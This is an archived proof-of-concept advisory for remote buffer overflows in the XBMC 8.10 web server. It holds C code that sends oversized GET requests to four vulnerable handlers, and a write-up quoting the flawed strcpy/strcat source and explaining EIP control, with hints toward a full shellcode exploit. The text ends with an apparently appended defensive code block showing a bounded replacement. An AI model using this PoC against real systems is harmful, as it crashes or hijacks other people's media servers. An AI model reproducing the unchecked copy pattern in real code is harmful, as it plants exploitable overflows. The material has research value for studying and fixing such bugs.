XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC

/*
XBMC multiple remote buffer overflow vulnerabilities.

XBMC is an award winning media center application for
Linux, Mac OS X, Windows and XBox. The ultimate hub
for all your media, XBMC is easy to use, looks slick,
and has a large helpful community. XBMC has won many
awards.

Affected version: XBMC 8.10 Atlantis
Tested on: Windows XP SP3 and Linux Ubuntu 8.10
Vendor's web site: http://xbmc.org/
Release date: April the 1st 2009

Credits go to n00b for finding the buffer overflow
and writing simple yet effective PoC code.
Shouts to everyone that knows me and has helped over
the years.

If you do wish to write an exploit for the buffer
overflow, please give credits.
You will also have to filter the bad chars from the
shellcode if you do wish to write an exploit for the
vulnerabilities in this advisory.

----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!

You can call by my blog to leave comments and feedback
and ask any questions you would like. It should be up
and running in a few days.

[--]
http://n00b-n00b.blogspot.com/
[--]

This PoC code was written on Linux using gcc-4.* to compile.
*/

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>

/* Just enough receive buffer to allow for the server banner!! */

#define BUFFSIZE 32


void error(char *mess)
{
    perror(mess);
    exit(1);
}

int main(int argc, char *argv[])
{
    int sock;
    int input;
    struct sockaddr_in http_client;
    char buffer[BUFFSIZE];

    /* You may need to add more buffer on Linux versions!!
       On Windows it is <1010> bytes to own EIP; the next 4 bytes
       are loaded into the $esp register. */
    char buffer1[1500];

    unsigned int http_len;
    unsigned int received = 0;

    /* If there are not exactly 2 arguments passed, print usage!! */
    if (argc != 3)
    {
        fprintf(stderr, "USAGE: %s Server_ip port\n", argv[0]);
        exit(1);
    }

    /* Create socket */
    if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
        error("Can't create socket");
    }


    /* Construct sockaddr */
    memset(&http_client, 0, sizeof(http_client));
    http_client.sin_family = AF_INET;
    http_client.sin_addr.s_addr = inet_addr(argv[1]);
    http_client.sin_port = htons(atoi(argv[2]));

    /* Establish connection */
    if (connect(sock,
                (struct sockaddr *) &http_client,
                sizeof(http_client)) < 0)
    {
        error("Failed to connect with remote host");
    }

    /* We need to construct all the vulnerable requests together */
    memset(buffer1, 0x41, sizeof(buffer1) - 1);
    buffer1[sizeof(buffer1) - 1] = '\0';

    printf("----------------------------------------------------------------\n");
    printf("XBMC remote buffer overflow poc code by n00b !!\n");
    printf("----------------------------------------------------------------\n");
    printf("[1]. Get request buffer overflow poc !!\n");
    printf("[2]. Get /xbmcHttp?command=takescreenshot buffer overflow !!\n");
    printf("[3]. Get /xbmcHttp?command=GetTagFromFilename buffer overflow !!\n");
    printf("[4]. queryvideodatabase possible format string poc !!\n");
    printf("----------------------------------------------------------------\n");
    printf("----------------------------------------------------------------\n");
    printf("[5]. Cancel and quit application !!\n");
    printf("----------------------\n");
    printf("Pick your http request: ");
    if (scanf("%d", &input) != 1)
    {
        error("Invalid input");
    }

    /* Each request is a fixed prefix, a run of 'A' filler, then a tail
       placed so the whole request fills buffer1. The tail is copied with
       its terminating NUL so strlen() below stops right after it. */
    const char *tail = NULL;
    switch (input)
    {
    case 1:
        memcpy(buffer1, "GET /", 5);
        tail = ".asp HTTP/1.1\r\n\r\n";
        break;
    case 2:
        memcpy(buffer1, "GET /xbmcCmds/xbmcHttp?command=takescreenshot(", 46);
        tail = ".jpg;false;0;300;200;90) HTTP/1.1\r\n\r\n";
        break;
    case 3:
        memcpy(buffer1, "GET /xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/", 53);
        tail = ".mp3) HTTP/1.1\r\n\r\n";
        break;
    case 4:
        strcpy(buffer1, "GET /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) HTTP/1.1\r\n\r\n");
        break;
    case 5:
        exit(0);
    default:
        error("Unknown option");
    }
    if (tail != NULL)
    {
        memcpy(buffer1 + (sizeof(buffer1) - 1) - strlen(tail), tail, strlen(tail) + 1);
    }


    /* Send our GET request to the server */
    http_len = strlen(buffer1);
    if (send(sock, buffer1, http_len, 0) != http_len)
    {
        error("No bytes were sent to remote host, check GET request !!");
    }


    /* Receive the current state of the server */
    fprintf(stdout, "Received: ");
    while (received < http_len)
    {
        int bytes = 0;
        if ((bytes = recv(sock, buffer, BUFFSIZE - 1, 0)) < 1)
        {
            error("Was the banner received?? If no banner, the exploit was successful!!");
        }
        received += bytes;
        buffer[bytes] = '\0';
        /* server data is untrusted, so never pass it as the format string */
        fprintf(stdout, "%s", buffer);
    }

    fprintf(stdout, "\n");
    close(sock);
    exit(0);
}


/*
A basic run down of the bugs found with a basic description.!!


(1)..(GET request websHomePageHandler buffer overflow)..

I was able to track down most of the vulnerable code. All this info
was collected on a Windows system.

The first buffer overflow I found in the XBMC application: all that is
required is to make a simple GET request adding 1033 bytes
of user supplied data to the request. We are then able to gain control of the
$eip register, and the next four bytes on the stack are where our $esp register
is pointing.


--snip--


Source of websHomePageHandler: ..\XBMC\xbmc\lib\libGoAhead\WebServer.cpp




        Home page handler

static int websHomePageHandler(webs_t wp, char_t *urlPrefix, char_t *webDir,
int arg, char_t *url, char_t *path, char_t *query)
{

        If the empty or "/" URL is invoked, redirect default URLs to the home page

        char dir[1024];
        char files[][20] = {
                        {"index.html"},
                        {"index.htm"},
                        {"home.htm"},
                        {"home.html"},
                        {"default.asp"},
                        {"home.asp"},
                        {'\0' }
                    };




        strcpy(dir, websGetDefaultDir());
        strcat(dir, path);
        for(u_int pos = 0; pos < strlen(dir); pos++)
                if (dir[pos] == '/') dir[pos] = '\\';

        DWORD attributes = GetFileAttributes(dir);
        if (FILE_ATTRIBUTE_DIRECTORY == attributes)
        {
                int i = 0;
                char buf[1024];
                while (files[i][0])
                {
                        strcpy(buf, dir);
                        if (buf[strlen(buf)-1] != '\\') strcat(buf, "\\");
                        strcat(buf, files[i]);

                        if (!access(buf, 0))
                        {
                                strcpy(buf, path);
                                if (path[strlen(path)-1] != '/') strcat(buf, "/");
                                strcat(buf, files[i]);
                                websRedirect(wp, buf);
                                return 1;
                        }
                        i++;
                }


--snip--


The next set of vulnerabilities are exploited through
the "Web Server HTTP API".
More information can be read at the following link.
I wrote a simple fuzzer and fuzzed all the commands that
were passed through the HTTP requests.



http://xbmc.org/wiki/?title=WebServerHTTP-API


(2)..(takescreenshot remote buffer overflow)..

Please visit the above link for more information
on specific commands. This is also a classic buffer
overflow where we can add a long file name to the
takescreenshot command and pass it to the API.
Once again we can overflow the statically allocated
buffer on the stack and own the application
flow, thus letting us execute our own supplied data.
Also, as a side note to this buffer overflow,
different registers are overwritten.

...\XBMC\xbmc\cores\DllLoader\exports\emu_msvcrt.cpp

--snip--


int dll_open(const char* szFileName, int iMode)
  {
    char str[XBMC_MAX_PATH];

    // move to CFile classes
    if (strncmp(szFileName, "\\Device\\Cdrom0", 14) == 0)
    {
      // replace "\\Device\\Cdrom0" with "D:"
      strcpy(str, "D:");
      strcat(str, szFileName + 14);
    }
    else strcpy(str, szFileName);

    CFile* pFile = new CFile();
    bool bBinary = false;
    if (iMode & O_BINARY)
      bBinary = true;
    bool bWrite = false;
    if ((iMode & O_RDWR) || (iMode & O_WRONLY))
      bWrite = true;
    bool bOverwrite=false;
    if ((iMode & _O_TRUNC) || (iMode & O_CREAT))
      bOverwrite = true;
    // currently always overwrites
    bool bResult;
    if (bWrite)
      bResult = pFile->OpenForWrite(_P(str), bBinary, bOverwrite);
    else
      bResult = pFile->Open(_P(str), bBinary);
    if (bResult)
    {
        EmuFileObject* object = g_emuFileWrapper.RegisterFileObject(pFile);
        if (object == NULL)
        {
          VERIFY(0);
          pFile->Close();
          delete pFile;
          return -1;
        }
        return g_emuFileWrapper.GetDescriptorByStream(&object->file_emu);
      }
      delete pFile;
      return -1;
  }

--snip--

We also know that szFileName is defined in a header file with
1024 bytes statically allocated. So if we pass more than 1024 bytes we can cause
stack corruption and overwrite the $eip; it also gives us a choice of registers
we can use for our shellcode.



(3)..(GetTagFromFilename remote buffer overflow)..

The buffer overflow happens when parsing an ID3 tag;
the difference is the registers that are overwritten
at the time of the access violation, which are as follows. I'm not
going to list all the source for all the exceptions.
This PoC is big enough already without adding more
information, and it is simple to set up XBMC and compile
on your own machine..



(4)..(SQLite queryvideodatabase)..

Just results in denial of service; no more information available.
Maybe I'll look more into sqlite3 in the future.

[--]
/xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s)
[--]

All the above vulnerabilities were tested on Linux and Windows:
on Linux Ubuntu 8.10 using strace to debug, and on Windows
I used Visual C++ Express 2008. This PoC code is just simple
PoC code to show the vulnerabilities I found within the XBMC
application.

It started off as closed source analysis. Although
the application was tested, there are still a lot of other
possibilities for exploitation. Even the login for the web server
could be vulnerable to a buffer overflow.

Also worth a mention is that I could take control over the XBMC
web server and there would be no error messages or anything to
suggest that the server had been taken offline; it carries on as
normal and the rest of XBMC stays the same without any changes.
It looks like it just terminates the thread, leaving the
rest of the application intact to continue running
like normal.


*/

// milw0rm.com [2009-04-01]
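The websHomePageHandler and dll_open excerpts above share one root cause: a request-derived string is copied into a fixed stack buffer (dir[1024], str[XBMC_MAX_PATH]) with strcpy/strcat and no length check. The block below is an added example, not XBMC's code and not part of the original advisory: it puts that unchecked pattern next to a bounded replacement that rejects input that would not fit, then applies the same '/' to '\' conversion the handler does. The base directory "C:\xbmc\web", the buffer size and the helper names are assumptions for the illustration.

```c
#include <stddef.h>
#include <string.h>

#define DIR_MAX 1024   /* same size as dir[1024] in websHomePageHandler */

/* The pattern from the quoted XBMC source: copy base, append path, no bound.
   A path longer than the room left in 'dir' overruns the stack buffer.
   Kept only for comparison; never call it with untrusted input. */
void join_unchecked(char *dir, const char *base, const char *path)
{
    strcpy(dir, base);
    strcat(dir, path);
}

/* Bounded replacement: size the result first, refuse anything that does not
   fit (NUL included), copy with explicit lengths. Returns 0 = ok, -1 = rejected. */
int join_checked(char *dir, size_t dir_size, const char *base, const char *path)
{
    size_t base_len = strlen(base);
    size_t path_len = strlen(path);
    size_t total = base_len + path_len;

    /* fits only if base_len + path_len + 1 <= dir_size, written without overflow */
    if (dir_size == 0 || base_len >= dir_size || path_len >= dir_size - base_len)
        return -1;   /* would overflow: reject rather than silently truncate */

    memcpy(dir, base, base_len);
    memcpy(dir + base_len, path, path_len);
    dir[total] = '\0';
    for (size_t i = 0; i < total; i++)
        if (dir[i] == '/') dir[i] = '\\';   /* same conversion the handler does */
    return 0;
}

/* Check helper: does join_checked() accept base+path and produce 'expected'? */
int join_checked_gives(const char *base, const char *path, const char *expected)
{
    char dir[DIR_MAX];
    return join_checked(dir, sizeof(dir), base, path) == 0 && strcmp(dir, expected) == 0;
}

/* Constructed request path: 'len' bytes of 'A', the way the PoC fills its request.
   Base directory "C:\\xbmc\\web" (11 bytes) is an assumed value for this example. */
int request_path_fits(size_t len)
{
    char dir[DIR_MAX];
    char path[2048];
    if (len >= sizeof(path)) return -1;
    memset(path, 'A', len);
    path[len] = '\0';
    return join_checked(dir, sizeof(dir), "C:\\xbmc\\web", path);
}
```

With the 11-byte base, 1012 bytes of path is the last length that fits in 1024 with its terminator; 1013 and the advisory's 1033 are refused instead of corrupting the stack.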



